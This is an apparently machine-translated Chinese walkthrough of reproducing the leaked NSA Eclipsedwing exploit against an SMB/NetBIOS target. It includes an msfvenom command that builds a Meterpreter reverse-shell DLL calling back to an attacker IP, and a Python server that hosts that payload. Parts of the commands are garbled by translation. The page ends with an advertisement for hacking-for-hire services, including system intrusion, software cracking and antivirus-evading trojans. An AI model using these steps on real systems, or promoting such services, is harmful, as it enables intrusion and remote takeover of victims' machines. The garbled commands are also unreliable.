导语 自Shadow Brokers发布NSA泄漏工具以来,各个专业已经相继发布了各种泄漏工具的exp恢复工具,以及WannaCry和EternalRocks洗劫病毒,所有这些都显示了泄漏工具的力量,但是在漏光工具中泄漏的工具有许多人都是15岁,在互联网上搜索了6个重复教程(Eternalblue,Eternalchampion,Eternalromance,Explodingcan,Esteemaudit,Easybee),其中一半以上没有相关信息。剩下的一半不重要吗?显然不是,NSA工具集有很多值得学习的地方。所以今天的文章有什么问题?请问众神! 前期准备
靶机环境
Eclipsedwin漏洞复现过程 使用Eclipsedwin
设置目标IP,端口和NetBIOSName。 NetBIOSName是计算机的标识名称。此名称主要用于LAN上的计算机之间的相互访问。可以通过在cmd中输入hostname来获取它。
然后基本上默认,
Rpctouch成功
Eclipsedwingtouch成功
此时,已在目标机器上建立连接。
利用Pcdlllauncher注入dll 使用Pcdlllauncher
需要注意的是,LPEntryname的路径需要实时存在,并找到相应的文件进行修改。 然后使用为弹跳shell生成的dll有效负载: 并使用python创建HTTP服务器,方便攻击者下载有效负载。 1 2 Msfvenom -p 窗户/Meterpreter就会/reverse_tcp lhost=192.168.226.128 学习端口=8090 --platform 窗口 -f DLL -o eclipsedwin.dll Python -m SimpleHTTPServer 9090
攻击者创建tmp目录并将eclipsedwin_exe.dll下载到tmp目录,然后将其配置为0以获取PCBehavior选项。
然后执行
运行提示“FAILED TO DUPLICATE SOCKET”,但有效负载已在目标上运行。查看metasploit,成功返回shell
Eclipsedwin支持的系统
NBT协议是 TCP/IP上的净 bios 属于SMB(服务器 消息 块) 用于文件和打印共享服务的Windows协议族。 NBT(NetBIOS over TCP/IP) 使用137(UDP), 138(UDP) 和 139 (TCP)来实现基于TCP/IP的NETBIOS Internetworking。
防范手段 安装MS08-067补丁,启用防火墙以过滤端口137-139,445,并关闭SMB服务。
原作文由乘客安全出版,作者:ComSoc 黑客业务列表介绍和一般分类: 类别:攻击入侵破解开发 1:攻击业务订单:暂时取消所有此类业务订单[仅销售常规IDC流量] 2:入侵业务清单:包括网站源代码,办公系统,黑色系统,教育系统等。 3:破解业务类:软件,加密文件,二次打包,脱壳等。 4:二次开发业务清单:软件二次开发,源代码二次开发等 5:其他业务订单:特洛伊木马[通过所有防病毒],远程控制,特殊软件等 备注:未提及的业务订单可根据主要类别查询或直接联系客户服务。为避免浪费双方时间,请在咨询前阅读:业务交易流程及相关说明 注意:仅接受正式业务,个人无权接受。收集此内容。